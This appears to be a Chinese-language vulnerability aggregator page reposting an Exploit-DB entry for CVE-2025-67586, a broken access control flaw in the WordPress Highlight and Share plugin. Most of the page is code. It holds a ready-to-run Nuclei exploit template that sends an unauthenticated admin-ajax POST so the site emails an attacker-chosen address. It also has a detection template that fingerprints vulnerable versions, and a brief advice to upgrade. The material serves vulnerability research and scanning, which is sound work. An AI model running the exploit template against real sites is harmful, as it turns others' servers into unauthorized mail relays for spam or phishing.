[webapps] WordPress Plugin 5.2.0 - Broken Access Control
CVE-2025-67586
漏洞
High · CVSS N/A📋 漏洞基础信息
| CVE | CVE-2025-67586 |
|---|---|
| 漏洞类型 | 漏洞 |
| 受影响版本 | 详见原文 |
| 危害等级 | High · CVSS N/A |
| 发布日期 | 2026-04-22 |
| 提交者 | Zeeshan Haider |
| 来源 | Exploit-DB 原文 ↗ |
⚔️ Nuclei Exploit 模板
以下为标准 Nuclei v3 格式的利用模板,可直接用于漏洞验证:
id: CVE-2025-67586-exploit
info:
name: WordPress Plugin Highlight and Share <= 5.2.0 - Broken Access Control Exploit
author: Zeeshan Haider
severity: high
description: |
Exploits a broken access control vulnerability in the Highlight and Share plugin for WordPress.
An unauthenticated attacker can reuse a valid post nonce to trigger unauthorized email sharing requests.
reference:
- https://www.exploit-db.com/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
cve-id: CVE-2025-67586
cwe-id: CWE-862
variables:
postId: "1"
permalink: "{{BaseURL}}/?p=1"
nonce: "valid_nonce_obtained_from_browser"
toEmail: "attacker@example.com"
subject: "PoC"
shareText: "POC test"
http:
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=has_email_form_submission&formData[postId]={{postId}}&formData[permalink]={{permalink}}&formData[nonce]={{nonce}}&formData[toEmail]={{toEmail}}&formData[subject]={{subject}}&formData[shareText]={{shareText}}&formData[emailShareType]=selection
matchers-condition: and
matchers:
- type: word
words:
- "success\":true"
part: body
- type: word
words:
- "shared this post"
part: body
- type: status
status:
- 200🔍 Nuclei Detection 模板
以下为漏洞探测模板,用于判断目标是否受影响:
id: CVE-2025-67586-detection
info:
name: WordPress Plugin Highlight and Share <= 5.2.0 - Broken Access Control Detection
author: Zeeshan Haider
severity: high
description: |
A broken access control vulnerability exists in the Highlight and Share plugin for WordPress.
The plugin exposes an unauthenticated AJAX action that allows attackers to abuse the
"Share via Email" functionality without proper permission checks.
reference:
- https://www.exploit-db.com/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
cve-id: CVE-2025-67586
cwe-id: CWE-862
http:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/highlight-and-share/readme.txt"
- "{{BaseURL}}/wp-content/plugins/highlight-and-share/highlight-and-share.php"
stop-at-first-match: true
matchers-condition: or
matchers:
- type: word
words:
- "Stable tag: 5.2.0"
- "Stable tag: 5.1"
- "Stable tag: 5.0"
- "Stable tag: 4."
- "Stable tag: 3."
- "Stable tag: 2."
- "Stable tag: 1."
part: body
- type: word
words:
- "Highlight and Share"
- "dlx_has"
part: body
- type: status
status:
- 200🛡️ 修复建议
请升级到厂商最新安全版本。
📎 参考链接
⚠️ 本文基于公开漏洞数据库,仅供安全研究与防御参考。生成时间: 2026-05-07 07:45 | 来源: Exploit-DB